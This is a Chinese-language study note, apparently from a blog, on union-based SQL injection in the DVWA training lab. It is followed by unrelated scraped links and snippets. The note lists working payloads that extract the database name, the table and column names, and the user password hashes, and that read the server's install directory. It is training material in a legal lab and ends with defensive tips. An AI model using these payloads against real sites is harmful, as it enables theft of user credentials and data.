Web安全测试学习笔记-DVWA-SQL注入-2
接上一篇SQL注入的学习笔记,上一篇我通过报错信息得知后台数据库是MySQL(这个信息非常重要~),然后通过SQL注入拿到了用户表的所有行,其实我们还可以通过MySQL的特性来拿更多的信息。
1. 获取当前数据库名称
输入:2' union select 1,database() '
输出:数据库名称为dvwa
database()是Mysql自带函数,用来获取当前数据库名称。

2.获取当前数据库所有表名
输入:1' union select 1,table_name from information_schema.tables where table_schema='dvwa
输出:dvwa数据库中一共有两张表,分别是gestbook和users
information_schema是MySQL自带数据库,用来存储MySQL数据库元数据,通俗来说就是MySQL中的所有数据库名,每个数据库的表名,每个表的列名等等。

3. 获取用户表的所有字段名
输入:1' union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users
输出:users表中比较重要的列名:user,password

4. 获取用户表中的数据
输入:'UNION select user,password from users# (#为MySQL的注释符,相当于将后面的单引号注释掉了)
输出:拿到了所有用户名和加密过的密码
如果数据库的密码存储的是明文,Hmm......
同理,你还想要什么数据,都可以随便取用了,把整个数据库拖出来都可以!
如果是涉及到money的系统数据库被攻破,Hmm......Hmm......

5. 获取操作系统类型
输入:'UNION select 1,@@basedir#
输出:Windows操作系统

一点点感悟:
1. 对输入进行过滤
2. 数据库中的敏感信息一定要加密!
3. 听说参数化和预编译能很好的防御SQL注入
如需转载,请注明出处,这是对他人劳动成果的尊重~
Web安全测试学习笔记-DVWA-SQL注入-2的更多相关文章
- Web安全测试学习笔记 - DVWA+PHP环境搭建
		
DVWA(Damn Vulnerable Web Application),是一个用PHP编写的,作为Web安全测试练习平台的合法环境(毕竟咱不能为了练习就随便找个网站去攻击...),也就是俗称的靶场 ...
 - SQL反模式学习笔记21  SQL注入
		
目标:编写SQL动态查询,防止SQL注入 通常所说的“SQL动态查询”是指将程序中的变量和基本SQL语句拼接成一个完整的查询语句. 反模式:将未经验证的输入作为代码执行 当向SQL查询的字符串中插入别 ...
 - Web安全测试学习笔记-SQL注入-利用concat和updatexml函数
		
mysql数据库中有两个函数:concat和updatexml,在sql注入时经常组合使用,本文通过学习concat和updatexml函数的使用方法,结合实例来理解这种sql注入方式的原理. con ...
 - CTFHub Web题学习笔记(SQL注入题解writeup)
		
Web题下的SQL注入 1,整数型注入 使用burpsuite,?id=1%20and%201=1 id=1的数据依旧出现,证明存在整数型注入 常规做法,查看字段数,回显位置 ?id=1%20orde ...
 - Web安全测试学习笔记-DVWA-SQL注入-1
		
SQL注入的定义网上很多,作为一个初学者,我对SQL注入的理解是这样的:网站应用一般都有后台数据库(不论是关系型还是非关系型),用户在网站上的绝大部分操作,最终都会跟数据库交互(也就是执行一串SQL语 ...
 - Web安全测试学习笔记-DVWA-盲注(使用sqlmap)
		
之前的sql注入页面(https://www.cnblogs.com/sallyzhang/p/11843291.html),返回了查询结果和错误信息.而下面的页面,返回信息只有存在和不存在两种情况, ...
 - ASP代码审计学习笔记-1.SQL注入
		
ASP注入漏洞 一.SQL注入的原因 按照参数形式:数字型/字符型/搜索型 1.数字型sql查询 sql注入原因: ID=49 这类注入的参数是数字型,SQL语句原貌大致如下: id=request. ...
 - Web安全测试学习笔记-DVWA-登录密码爆破(使用Burp Suite)
		
密码爆破简单来说,就是使用密码本(记录了若干密码),用工具(手工也可以,if you like...)一条条读取密码本中的密码后发送登录请求,遍历密码本的过程中可能试出真正的密码. 本文学习在已知登录 ...
 - Web安全测试学习笔记 - 文件包含
		
基础知识 文件包含指的是一个文件动态引用另一个文件,这是一种非常灵活的动态调用方式.有点类似Java引用jar包,但区别在于jar包引用后一般是固定不变的(一般不能动态改变所引用的jar包名称),而文 ...
 
随机推荐
- (Concurrent)HashMap的存储过程及原理。
			
1.前言 看完咕泡Jack前辈的有关hashMap的视频(非宣传,jack自带1.5倍嘴速,高效),收益良多,所以记录一下学习到的东西. 2.基础用法 源码的注释首先就介绍了哈希表是基于Map接口,所 ...
 - hdu 1054 Strategic Game (简单树形DP)
			
Strategic Game Time Limit: 20000/10000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others) ...
 - 《Dotnet9》建站-建站20天感悟
			
时间如流水,只能流去不流回! 点赞再看,养成习惯,这是您给我创作的动力! 本文 Dotnet9 https://dotnet9.com 已收录,站长乐于分享dotnet相关技术,比如Winform.W ...
 - Codeforces Round #609 (Div. 2)
			
A题 给出n,求大于n的两个合数a和b,并且a-b = n 直接输出n的倍数即可 int n; int main() { cin >> n; cout << 9*n <& ...
 - Windows Terminal 美化分享
			
美化前: 美化后: Json分享: { "acrylicOpacity": 0.75, "closeOnExit": true, "colorSch ...
 - 微信小程序APP生命周期
			
小程序APP生命周期需要先从app.js这个文件开始,App() 必须在 app.js 中调用,必须调用且只能调用一次,app.js中定义了一些应用的生命周期函数 onLaunch----当小程序初始 ...
 - SAP Business One对象清单
			
中文描述 对象号 表名 主键 英文描述 总账科目 1 OACT AcctCode G/L Accounts 业务伙伴 2 OCRD CardCode Business Partner 银行代码 3 O ...
 - Charles抓包iPhone注意点以及SSL Proxying enabled for this host
			
0.介绍Charles 抓包 Charles是一款很强大的抓包工具,现在记录下来分享给大家.常用的有以下几款功能: 1.支持配置抓取定向地址的网络请求 打开charles,打开Proxy->Re ...
 - TP5 try{}catch{}异常捕获不到 解决办法
			
问题:TP5用下面的方法, 想要获取抛出的异常捕获不到…… 错误的写法: try{ …… } catch (Exception $e) { echo $e->getMessage(); } 正确 ...
 - MySql事务的简单使用
			
4个特性 原子性:一个事务中的所有操作,要么全部完成,要么全部不完成,不会结束在中间某个环节.事务在执行过程中发生错误,会被回滚(rollback)到事务开始前的状态 一致性:在事务开始前和事务结束以 ...